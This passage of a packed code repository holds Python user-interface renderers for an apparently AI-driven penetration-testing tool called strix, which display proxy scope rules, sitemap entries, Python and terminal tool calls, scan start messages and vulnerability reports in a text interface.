style=\"#22c55e\")\n if code:\n text.append(f\"{code}\", style=_status_style(code))\n if time_ms:\n text.append(f\" ({time_ms}ms)\", style=\"dim\")\n\n body = result.get(\"body\", \"\")\n if body and isinstance(body, str):\n lines = body.split(\"\\n\")[:5]\n for line in lines:\n text.append(\"\\n\")\n text.append(\" << \", style=\"#22c55e\")\n text.append(_truncate(line, MAX_LINE_LENGTH - 5), style=\"dim\")\n\n if len(body.split(\"\\n\")) > 5:\n text.append(\"\\n\")\n text.append(\" ...\", style=\"dim italic\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ScopeRulesRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"scope_rules\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912, PLR0915\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n action = args.get(\"action\", \"\")\n scope_name = args.get(\"scope_name\", \"\")\n scope_id = args.get(\"scope_id\", \"\")\n allowlist = args.get(\"allowlist\")\n denylist = args.get(\"denylist\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n\n action_map = {\n \"get\": \"getting\",\n \"list\": \"listing\",\n \"create\": \"creating\",\n \"update\": \"updating\",\n \"delete\": \"deleting\",\n }\n action_text = action_map.get(action, action + \"ing\" if action else \"managing\")\n text.append(f\" {action_text} proxy scope\", style=\"#06b6d4\")\n\n if scope_name:\n text.append(f\" '{_truncate(scope_name, 50)}'\", style=\"dim italic\")\n if scope_id and isinstance(scope_id, str):\n text.append(f\" #{scope_id[:8]}\", style=\"dim\")\n\n if allowlist and isinstance(allowlist, list):\n allow_str = \", \".join(_truncate(str(a), 40) for a in allowlist[:4])\n text.append(f\"\\n allow: {allow_str}\", style=\"dim\")\n if len(allowlist) > 4:\n text.append(f\" +{len(allowlist) - 4}\", style=\"dim italic\")\n if denylist and isinstance(denylist, list):\n deny_str = \", \".join(_truncate(str(d), 40) for d in denylist[:4])\n text.append(f\"\\n deny: {deny_str}\", style=\"dim\")\n if len(denylist) > 4:\n text.append(f\" +{len(denylist) - 4}\", style=\"dim italic\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\" error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n elif \"scopes\" in result:\n scopes = result.get(\"scopes\", [])\n text.append(f\" [{len(scopes)} scopes]\", style=\"dim\")\n\n if scopes and isinstance(scopes, list):\n text.append(\"\\n\")\n for i, scope in enumerate(scopes[:5]):\n if not isinstance(scope, dict):\n continue\n name = scope.get(\"name\", \"?\")\n allow = scope.get(\"allowlist\") or []\n text.append(\" \")\n text.append(_truncate(str(name), 40), style=\"#22c55e\")\n if allow and isinstance(allow, list):\n allow_str = \", \".join(_truncate(str(a), 30) for a in allow[:3])\n text.append(f\" {allow_str}\", style=\"dim\")\n if len(allow) > 3:\n text.append(f\" +{len(allow) - 3}\", style=\"dim italic\")\n if i < min(len(scopes), 5) - 1:\n text.append(\"\\n\")\n\n elif \"scope\" in result:\n scope = result.get(\"scope\") or {}\n if isinstance(scope, dict):\n allow = scope.get(\"allowlist\") or []\n deny = scope.get(\"denylist\") or []\n\n if allow and isinstance(allow, list):\n allow_str = \", \".join(_truncate(str(a), 40) for a in allow[:5])\n text.append(f\"\\n allow: {allow_str}\", style=\"dim\")\n if deny and isinstance(deny, list):\n deny_str = \", \".join(_truncate(str(d), 40) for d in deny[:5])\n text.append(f\"\\n deny: {deny_str}\", style=\"dim\")\n\n elif \"message\" in result:\n text.append(f\" {result['message']}\", style=\"#22c55e\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ListSitemapRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"list_sitemap\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912, PLR0915\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n parent_id = args.get(\"parent_id\")\n scope_id = args.get(\"scope_id\")\n depth = args.get(\"depth\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n text.append(\" listing sitemap\", style=\"#06b6d4\")\n\n if parent_id:\n text.append(f\" under #{_truncate(str(parent_id), 20)}\", style=\"dim\")\n\n meta_parts = []\n if scope_id and isinstance(scope_id, str):\n meta_parts.append(f\"scope:{scope_id[:8]}\")\n if depth and depth != \"DIRECT\":\n meta_parts.append(depth.lower())\n if meta_parts:\n text.append(f\" ({', '.join(meta_parts)})\", style=\"dim\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\" error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n else:\n total = result.get(\"total_count\", 0)\n entries = result.get(\"entries\", [])\n\n text.append(f\" [{total} entries]\", style=\"dim\")\n\n if entries and isinstance(entries, list):\n text.append(\"\\n\")\n for i, entry in enumerate(entries[:MAX_REQUESTS_DISPLAY]):\n if not isinstance(entry, dict):\n continue\n kind = entry.get(\"kind\") or \"?\"\n label = entry.get(\"label\") or \"?\"\n has_children = entry.get(\"hasDescendants\", False)\n req = entry.get(\"request\") or {}\n\n kind_style = {\n \"DOMAIN\": \"#f59e0b\",\n \"DIRECTORY\": \"#3b82f6\",\n \"REQUEST\": \"#22c55e\",\n }.get(kind, \"dim\")\n\n text.append(\" \")\n kind_abbr = kind[:3] if isinstance(kind, str) else \"?\"\n text.append(f\"{kind_abbr:3}\", style=kind_style)\n text.append(f\" {_truncate(label, 150)}\", style=\"dim\")\n\n if req:\n method = req.get(\"method\", \"\")\n code = req.get(\"status\")\n if method:\n text.append(f\" {method}\", style=\"#a78bfa\")\n if code:\n text.append(f\" {code}\", style=_status_style(code))\n\n if has_children:\n text.append(\" +\", style=\"dim italic\")\n\n if i < min(len(entries), MAX_REQUESTS_DISPLAY) - 1:\n text.append(\"\\n\")\n\n if len(entries) > MAX_REQUESTS_DISPLAY:\n text.append(\"\\n\")\n text.append(\n f\" ... +{len(entries) - MAX_REQUESTS_DISPLAY} more\", style=\"dim italic\"\n )\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ViewSitemapEntryRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"view_sitemap_entry\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n entry_id = args.get(\"entry_id\", \"\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n text.append(\" viewing sitemap\", style=\"#06b6d4\")\n\n if entry_id:\n text.append(f\" #{_truncate(str(entry_id), 20)}\", style=\"dim\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\" error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n elif \"entry\" in result:\n entry = result.get(\"entry\") or {}\n if not isinstance(entry, dict):\n entry = {}\n kind = entry.get(\"kind\", \"\")\n label = entry.get(\"label\", \"\")\n related = entry.get(\"related_requests\") or {}\n related_reqs = related.get(\"requests\", []) if isinstance(related, dict) else []\n total_related = related.get(\"total_count\", 0) if isinstance(related, dict) else 0\n\n if kind and label:\n text.append(f\" {kind}: {_truncate(label, 120)}\", style=\"dim\")\n\n if total_related:\n text.append(f\" [{total_related} requests]\", style=\"dim\")\n\n if related_reqs and isinstance(related_reqs, list):\n text.append(\"\\n\")\n for i, req in enumerate(related_reqs[:10]):\n if not isinstance(req, dict):\n continue\n method = req.get(\"method\", \"?\")\n path = req.get(\"path\", \"/\")\n code = req.get(\"status\")\n\n text.append(\" \")\n text.append(f\"{method:6}\", style=\"#a78bfa\")\n text.append(f\" {_truncate(path, 180)}\", style=\"dim\")\n if code:\n text.append(f\" {code}\", style=_status_style(code))\n\n if i < min(len(related_reqs), 10) - 1:\n text.append(\"\\n\")\n\n if len(related_reqs) > 10:\n text.append(\"\\n\")\n text.append(f\" ... +{len(related_reqs) - 10} more\", style=\"dim italic\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/python_renderer.py", "content": "import re\nfrom functools import cache\nfrom typing import Any, ClassVar\n\nfrom pygments.lexers import PythonLexer\nfrom pygments.styles import get_style_by_name\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\nMAX_OUTPUT_LINES = 50\nMAX_LINE_LENGTH = 200\n\nANSI_PATTERN = re.compile(r\"\\x1b(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~]|\\][^\\x07]*\\x07)\")\n\nSTRIP_PATTERNS = [\n r\"\\.\\.\\. \\[(stdout|stderr|result|output|error) truncated at \\d+k? chars\\]\",\n]\n\n\n@cache\ndef _get_style_colors() -> dict[Any, str]:\n style = get_style_by_name(\"native\")\n return {token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]}\n\n\n@cache\ndef _get_lexer() -> PythonLexer:\n return PythonLexer()\n\n\n@cache\ndef _get_token_color(token_type: Any) -> str | None:\n colors = _get_style_colors()\n while token_type:\n if token_type in colors:\n return colors[token_type]\n token_type = token_type.parent\n return None\n\n\n@register_tool_renderer\nclass PythonRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"python_action\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"python-tool\"]\n\n @classmethod\n def _highlight_python(cls, code: str) -> Text:\n text = Text()\n for token_type, token_value in _get_lexer().get_tokens(code):\n if token_value:\n text.append(token_value, style=_get_token_color(token_type))\n return text\n\n @classmethod\n def _clean_output(cls, output: str) -> str:\n cleaned = output\n for pattern in STRIP_PATTERNS:\n cleaned = re.sub(pattern, \"\", cleaned)\n return cleaned.strip()\n\n @classmethod\n def _strip_ansi(cls, text: str) -> str:\n return ANSI_PATTERN.sub(\"\", text)\n\n @classmethod\n def _truncate_line(cls, line: str) -> str:\n clean_line = cls._strip_ansi(line)\n if len(clean_line) > MAX_LINE_LENGTH:\n return clean_line[: MAX_LINE_LENGTH - 3] + \"...\"\n return clean_line\n\n @classmethod\n def _format_output(cls, output: str) -> Text:\n text = Text()\n lines = output.splitlines()\n total_lines = len(lines)\n\n head_count = MAX_OUTPUT_LINES // 2\n tail_count = MAX_OUTPUT_LINES - head_count - 1\n\n if total_lines <= MAX_OUTPUT_LINES:\n display_lines = lines\n truncated = False\n hidden_count = 0\n else:\n display_lines = lines[:head_count]\n truncated = True\n hidden_count = total_lines - head_count - tail_count\n\n for i, line in enumerate(display_lines):\n truncated_line = cls._truncate_line(line)\n text.append(\" \")\n text.append(truncated_line, style=\"dim\")\n if i < len(display_lines) - 1 or truncated:\n text.append(\"\\n\")\n\n if truncated:\n text.append(f\" ... {hidden_count} lines truncated ...\", style=\"dim italic\")\n text.append(\"\\n\")\n tail_lines = lines[-tail_count:]\n for i, line in enumerate(tail_lines):\n truncated_line = cls._truncate_line(line)\n text.append(\" \")\n text.append(truncated_line, style=\"dim\")\n if i < len(tail_lines) - 1:\n text.append(\"\\n\")\n\n return text\n\n @classmethod\n def _append_output(cls, text: Text, result: dict[str, Any] | str) -> None:\n if isinstance(result, str):\n if result.strip():\n text.append(\"\\n\")\n text.append_text(cls._format_output(result))\n return\n\n stdout = result.get(\"stdout\", \"\")\n stdout = cls._clean_output(stdout) if stdout else \"\"\n\n if stdout:\n text.append(\"\\n\")\n formatted_output = cls._format_output(stdout)\n text.append_text(formatted_output)\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n result = tool_data.get(\"result\")\n\n action = args.get(\"action\", \"\")\n code = args.get(\"code\", \"\")\n\n text = Text()\n text.append(\" \", style=\"dim\")\n\n if code and action in [\"new_session\", \"execute\"]:\n text.append_text(cls._highlight_python(code))\n elif action == \"close\":\n text.append(\"Closing session...\", style=\"dim\")\n elif action == \"list_sessions\":\n text.append(\"Listing sessions...\", style=\"dim\")\n else:\n text.append(\"Running...\", style=\"dim\")\n\n if result and isinstance(result, dict | str):\n cls._append_output(text, result)\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/registry.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\n\n\nclass ToolTUIRegistry:\n _renderers: ClassVar[dict[str, type[BaseToolRenderer]]] = {}\n\n @classmethod\n def register(cls, renderer_class: type[BaseToolRenderer]) -> None:\n if not renderer_class.tool_name:\n raise ValueError(f\"Renderer {renderer_class.__name__} must define tool_name\")\n\n cls._renderers[renderer_class.tool_name] = renderer_class\n\n @classmethod\n def get_renderer(cls, tool_name: str) -> type[BaseToolRenderer] | None:\n return cls._renderers.get(tool_name)\n\n @classmethod\n def list_tools(cls) -> list[str]:\n return list(cls._renderers.keys())\n\n @classmethod\n def has_renderer(cls, tool_name: str) -> bool:\n return tool_name in cls._renderers\n\n\ndef register_tool_renderer(renderer_class: type[BaseToolRenderer]) -> type[BaseToolRenderer]:\n ToolTUIRegistry.register(renderer_class)\n return renderer_class\n\n\ndef get_tool_renderer(tool_name: str) -> type[BaseToolRenderer] | None:\n return ToolTUIRegistry.get_renderer(tool_name)\n\n\ndef render_tool_widget(tool_data: dict[str, Any]) -> Static:\n tool_name = tool_data.get(\"tool_name\", \"\")\n renderer = get_tool_renderer(tool_name)\n\n if renderer:\n return renderer.render(tool_data)\n return _render_default_tool_widget(tool_data)\n\n\ndef _render_default_tool_widget(tool_data: dict[str, Any]) -> Static:\n tool_name = tool_data.get(\"tool_name\", \"Unknown Tool\")\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n result = tool_data.get(\"result\")\n\n text = Text()\n\n text.append(\"β†’ Using tool \", style=\"dim\")\n text.append(tool_name, style=\"bold blue\")\n text.append(\"\\n\")\n\n for k, v in list(args.items()):\n str_v = str(v)\n text.append(\" \")\n text.append(k, style=\"dim\")\n text.append(\": \")\n text.append(str_v)\n text.append(\"\\n\")\n\n if status in [\"completed\", \"failed\", \"error\"] and result is not None:\n result_str = str(result)\n text.append(\"Result: \", style=\"bold\")\n text.append(result_str)\n else:\n icon, color = BaseToolRenderer.status_icon(status)\n text.append(icon, style=color)\n\n css_classes = BaseToolRenderer.get_css_classes(status)\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/reporting_renderer.py", "content": "from functools import cache\nfrom typing import Any, ClassVar\n\nfrom pygments.lexers import PythonLexer\nfrom pygments.styles import get_style_by_name\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom strix.tools.reporting.reporting_actions import (\n parse_code_locations_xml,\n parse_cvss_xml,\n)\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@cache\ndef _get_style_colors() -> dict[Any, str]:\n style = get_style_by_name(\"native\")\n return {token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]}\n\n\nFIELD_STYLE = \"bold #4ade80\"\nDIM_STYLE = \"dim\"\nFILE_STYLE = \"bold #60a5fa\"\nLINE_STYLE = \"#facc15\"\nLABEL_STYLE = \"italic #a1a1aa\"\nCODE_STYLE = \"#e2e8f0\"\nBEFORE_STYLE = \"#ef4444\"\nAFTER_STYLE = \"#22c55e\"\n\n\n@register_tool_renderer\nclass CreateVulnerabilityReportRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"create_vulnerability_report\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"reporting-tool\"]\n\n SEVERITY_COLORS: ClassVar[dict[str, str]] = {\n \"critical\": \"#dc2626\",\n \"high\": \"#ea580c\",\n \"medium\": \"#d97706\",\n \"low\": \"#65a30d\",\n \"info\": \"#0284c7\",\n }\n\n @classmethod\n def _get_token_color(cls, token_type: Any) -> str | None:\n colors = _get_style_colors()\n while token_type:\n if token_type in colors:\n return colors[token_type]\n token_type = token_type.parent\n return None\n\n @classmethod\n def _highlight_python(cls, code: str) -> Text:\n lexer = PythonLexer()\n text = Text()\n\n for token_type, token_value in lexer.get_tokens(code):\n if not token_value:\n continue\n color = cls._get_token_color(token_type)\n text.append(token_value, style=color)\n\n return text\n\n @classmethod\n def _get_cvss_color(cls, cvss_score: float) -> str:\n if cvss_score >= 9.0:\n return \"#dc2626\"\n if cvss_score >= 7.0:\n return \"#ea580c\"\n if cvss_score >= 4.0:\n return \"#d97706\"\n if cvss_score >= 0.1:\n return \"#65a30d\"\n return \"#6b7280\"\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912, PLR0915\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\", {})\n\n title = args.get(\"title\", \"\")\n description = args.get(\"description\", \"\")\n impact = args.get(\"impact\", \"\")\n target = args.get(\"target\", \"\")\n technical_analysis = args.get(\"technical_analysis\", \"\")\n poc_description = args.get(\"poc_description\", \"\")\n poc_script_code = args.get(\"poc_script_code\", \"\")\n remediation_steps = args.get(\"remediation_steps\", \"\")\n\n cvss_breakdown_xml = args.get(\"cvss_breakdown\", \"\")\n code_locations_xml = args.get(\"code_locations\", \"\")\n\n endpoint = args.get(\"endpoint\", \"\")\n method = args.get(\"method\", \"\")\n cve = args.get(\"cve\", \"\")\n cwe = args.get(\"cwe\", \"\")\n\n severity = \"\"\n cvss_score = None\n if isinstance(result, dict):\n severity = result.get(\"severity\", \"\")\n cvss_score = result.get(\"cvss_score\")\n\n text = Text()\n text.append(\"🐞 \")\n text.append(\"Vulnerability Report\", style=\"bold #ea580c\")\n\n if title:\n text.append(\"\\n\\n\")\n text.append(\"Title: \", style=FIELD_STYLE)\n text.append(title)\n\n if severity:\n text.append(\"\\n\\n\")\n text.append(\"Severity: \", style=FIELD_STYLE)\n severity_color = cls.SEVERITY_COLORS.get(severity.lower(), \"#6b7280\")\n text.append(severity.upper(), style=f\"bold {severity_color}\")\n\n if cvss_score is not None:\n text.append(\"\\n\\n\")\n text.append(\"CVSS Score: \", style=FIELD_STYLE)\n cvss_color = cls._get_cvss_color(cvss_score)\n text.append(str(cvss_score), style=f\"bold {cvss_color}\")\n\n if target:\n text.append(\"\\n\\n\")\n text.append(\"Target: \", style=FIELD_STYLE)\n text.append(target)\n\n if endpoint:\n text.append(\"\\n\\n\")\n text.append(\"Endpoint: \", style=FIELD_STYLE)\n text.append(endpoint)\n\n if method:\n text.append(\"\\n\\n\")\n text.append(\"Method: \", style=FIELD_STYLE)\n text.append(method)\n\n if cve:\n text.append(\"\\n\\n\")\n text.append(\"CVE: \", style=FIELD_STYLE)\n text.append(cve)\n\n if cwe:\n text.append(\"\\n\\n\")\n text.append(\"CWE: \", style=FIELD_STYLE)\n text.append(cwe)\n\n parsed_cvss = parse_cvss_xml(cvss_breakdown_xml) if cvss_breakdown_xml else None\n if parsed_cvss:\n text.append(\"\\n\\n\")\n cvss_parts = []\n for key, prefix in [\n (\"attack_vector\", \"AV\"),\n (\"attack_complexity\", \"AC\"),\n (\"privileges_required\", \"PR\"),\n (\"user_interaction\", \"UI\"),\n (\"scope\", \"S\"),\n (\"confidentiality\", \"C\"),\n (\"integrity\", \"I\"),\n (\"availability\", \"A\"),\n ]:\n val = parsed_cvss.get(key)\n if val:\n cvss_parts.append(f\"{prefix}:{val}\")\n text.append(\"CVSS Vector: \", style=FIELD_STYLE)\n text.append(\"/\".join(cvss_parts), style=DIM_STYLE)\n\n if description:\n text.append(\"\\n\\n\")\n text.append(\"Description\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(description)\n\n if impact:\n text.append(\"\\n\\n\")\n text.append(\"Impact\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(impact)\n\n if technical_analysis:\n text.append(\"\\n\\n\")\n text.append(\"Technical Analysis\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(technical_analysis)\n\n parsed_locations = (\n parse_code_locations_xml(code_locations_xml) if code_locations_xml else None\n )\n if parsed_locations:\n text.append(\"\\n\\n\")\n text.append(\"Code Locations\", style=FIELD_STYLE)\n for i, loc in enumerate(parsed_locations):\n text.append(\"\\n\\n\")\n text.append(f\" Location {i + 1}: \", style=DIM_STYLE)\n text.append(loc.get(\"file\", \"unknown\"), style=FILE_STYLE)\n start = loc.get(\"start_line\")\n end = loc.get(\"end_line\")\n if start is not None:\n if end and end != start:\n text.append(f\":{start}-{end}\", style=LINE_STYLE)\n else:\n text.append(f\":{start}\", style=LINE_STYLE)\n if loc.get(\"label\"):\n text.append(f\"\\n {loc['label']}\", style=LABEL_STYLE)\n if loc.get(\"snippet\"):\n text.append(\"\\n \")\n text.append(loc[\"snippet\"], style=CODE_STYLE)\n if loc.get(\"fix_before\") or loc.get(\"fix_after\"):\n text.append(\"\\n \")\n text.append(\"Fix:\", style=DIM_STYLE)\n if loc.get(\"fix_before\"):\n text.append(\"\\n \")\n text.append(\"- \", style=BEFORE_STYLE)\n text.append(loc[\"fix_before\"], style=BEFORE_STYLE)\n if loc.get(\"fix_after\"):\n text.append(\"\\n \")\n text.append(\"+ \", style=AFTER_STYLE)\n text.append(loc[\"fix_after\"], style=AFTER_STYLE)\n\n if poc_description:\n text.append(\"\\n\\n\")\n text.append(\"PoC Description\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(poc_description)\n\n if poc_script_code:\n text.append(\"\\n\\n\")\n text.append(\"PoC Code\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append_text(cls._highlight_python(poc_script_code))\n\n if remediation_steps:\n text.append(\"\\n\\n\")\n text.append(\"Remediation\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(remediation_steps)\n\n if not title:\n text.append(\"\\n \")\n text.append(\"Creating report...\", style=\"dim\")\n\n padded = Text()\n padded.append(\"\\n\\n\")\n padded.append_text(text)\n padded.append(\"\\n\\n\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(padded, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/scan_info_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass ScanStartInfoRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"scan_start_info\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"scan-info-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n targets = args.get(\"targets\", [])\n\n text = Text()\n text.append(\"β—ˆ \", style=\"#22c55e\")\n text.append(\"Starting penetration test\")\n\n if len(targets) == 1:\n text.append(\" on \")\n text.append(cls._get_target_display(targets[0]))\n elif len(targets) > 1:\n text.append(f\" on {len(targets)} targets\")\n for target_info in targets:\n text.append(\"\\n β€’ \")\n text.append(cls._get_target_display(target_info))\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n @classmethod\n def _get_target_display(cls, target_info: dict[str, Any]) -> str:\n original = target_info.get(\"original\")\n if original:\n return str(original)\n return \"unknown target\"\n\n\n@register_tool_renderer\nclass SubagentStartInfoRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"subagent_start_info\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"subagent-info-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n\n name = str(args.get(\"name\", \"Unknown Agent\"))\n task = str(args.get(\"task\", \"\"))\n\n text = Text()\n text.append(\"β—ˆ \", style=\"#a78bfa\")\n text.append(\"subagent \", style=\"dim\")\n text.append(name, style=\"bold #a78bfa\")\n\n if task:\n text.append(\"\\n \")\n text.append(task, style=\"dim\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/terminal_renderer.py", "content": "import re\nfrom functools import cache\nfrom typing import Any, ClassVar\n\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.styles import get_style_by_name\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\nMAX_OUTPUT_LINES = 50\nMAX_LINE_LENGTH = 200\n\nSTRIP_PATTERNS = [\n (\n r\"\\n?\\[Command still running after [\\d.]+s - showing output so far\\.?\"\n r\"\\s*(?:Use C-c to interrupt if needed\\.)?\\]\"\n ),\n r\"^\\[Below is the output of the previous command\\.\\]\\n?\",\n r\"^No command is currently running\\. Cannot send input\\.$\",\n (\n r\"^A command is already running\\. Use is_input=true to send input to it, \"\n r\"or interrupt it first \\(e\\.g\\., with C-c\\)\\.$\"\n ),\n]\n\n\n@cache\ndef _get_style_colors() -> dict[Any, str]:\n style = get_style_by_name(\"native\")\n return {token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]}\n\n\n@register_tool_renderer\nclass TerminalRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"terminal_execute\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"terminal-tool\"]\n\n CONTROL_SEQUENCES: ClassVar[set[str]] = {\n \"C-c\",\n \"C-d\",\n \"C-z\",\n \"C-a\",\n \"C-e\",\n \"C-k\",\n \"C-l\",\n \"C-u\",\n \"C-w\",\n \"C-r\",\n \"C-s\",\n \"C-t\",\n \"C-y\",\n \"^c\",\n \"^d\",\n \"^z\",\n \"^a\",\n \"^e\",\n \"^k\",\n \"^l\",\n \"^u\",\n \"^w\",\n \"^r\",\n \"^s\",\n \"^t\",\n \"^y\",\n }\n SPECIAL_KEYS: ClassVar[set[str]] = {\n \"Enter\",\n \"Escape\",\n \"Space\",\n \"Tab\",\n \"BTab\",\n \"BSpace\",\n \"DC\",\n \"IC\",\n \"Up\",\n \"Down\",\n \"Left\",\n \"Right\",\n \"Home\",\n \"End\",\n \"PageUp\",\n \"PageDown\",\n \"PgUp\",\n \"PgDn\",\n \"PPage\",\n \"NPage\",\n \"F1\",\n \"F2\",\n \"F3\",\n \"F4\",\n \"F5\",\n \"F6\",\n \"F7\",\n \"F8\",\n \"F9\",\n \"F10\",\n \"F11\",\n \"F12\",\n }\n\n @classmethod\n def _get_token_color(cls, token_type: Any) -> str | None:\n colors = _get_style_colors()\n while token_type:\n if token_type in colors:\n return colors[token_type]\n token_type = token_type.parent\n return None\n\n @classmethod\n def _highlight_bash(cls, code: str) -> Text:\n lexer = get_lexer_by_name(\"bash\")\n text = Text()\n\n for token_type, token_value in lexer.get_tokens(code):\n if not token_value:\n continue\n color = cls._get_token_color(token_type)\n text.append(token_value, style=color)\n\n return text\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n result = tool_data.get(\"result\")\n\n command = args.get(\"command\", \"\")\n is_input = args.get(\"is_input\", False)\n\n content = cls._build_content(command, is_input, status, result)\n\n css_classes = cls.get_css_classes(status)\n return Static(content, classes=css_classes)\n\n @classmethod\n def _build_content(\n cls, command: str, is_input: bool, status: str, result: dict[str, Any] | str | None\n ) -> Text:\n text = Text()\n terminal_icon = \">_\"\n\n if not command.strip():\n text.append(terminal_icon, style=\"dim\")\n text.append(\" \")\n text.append(\"getting logs...\", style=\"dim\")\n if result:\n cls._append_output(text, result, status, command)\n return text\n\n is_special = (\n command in cls.CONTROL_SEQUENCES\n or command in cls.SPECIAL_KEYS\n or command.startswith((\"M-\", \"S-\", \"C-S-\", \"C-M-\", \"S-M-\"))\n )\n\n text.append(terminal_icon, style=\"dim\")\n text.append(\" \")\n\n if is_special:\n text.append(command, style=\"#ef4444\")\n elif is_input:\n text.append(\">>>\", style=\"#3b82f6\")\n text.append(\" \")\n text.append_text(cls._format_command(command))\n else:\n text.append(\"$\", style=\"#22c55e\")\n text.append(\" \")\n text.append_text(cls._format_command(command))\n\n if result:\n cls._append_output(text, result, status, command)\n\n return text\n\n @classmethod\n def _clean_output(cls, output: str, command: str = \"\") -> str:\n cleaned = output\n\n for pattern in STRIP_PATTERNS:\n cleaned = re.sub(pattern, \"\", cleaned, flags=re.MULTILINE)\n\n if cleaned.strip():\n lines = cleaned.splitlines()\n filtered_lines: list[str] = []\n for line in lines:\n if not filtered_lines and not line.strip():\n continue\n if re.match(r\"^\\[STRIX_\\d+\\]\\$\\s*\", line):\n continue\n if command and line.strip() == command.strip():\n continue\n if command and re.match(r\"^[\\$#>]\\s*\" + re.escape(command.strip()) + r\"\\s*$\", line):\n continue\n filtered_lines.append(line)\n\n while filtered_lines and re.match(r\"^\\[STRIX_\\d+\\]\\$\\s*\", filtered_lines[-1]):\n filtered_lines.pop()\n\n cleaned = \"\\n\".join(filtered_lines)\n\n return cleaned.strip()\n\n @classmethod\n def _append_output(\n cls, text: Text, result: dict[str, Any] | str, tool_status: str, command: str = \"\"\n ) -> None:\n if isinstance(result, str):\n if result.strip():\n text.append(\"\\n\")\n text.append_text(cls._format_output(result))\n return\n\n raw_output = result.get(\"content\", \"\")\n output = cls._clean_output(raw_output, command)\n error = 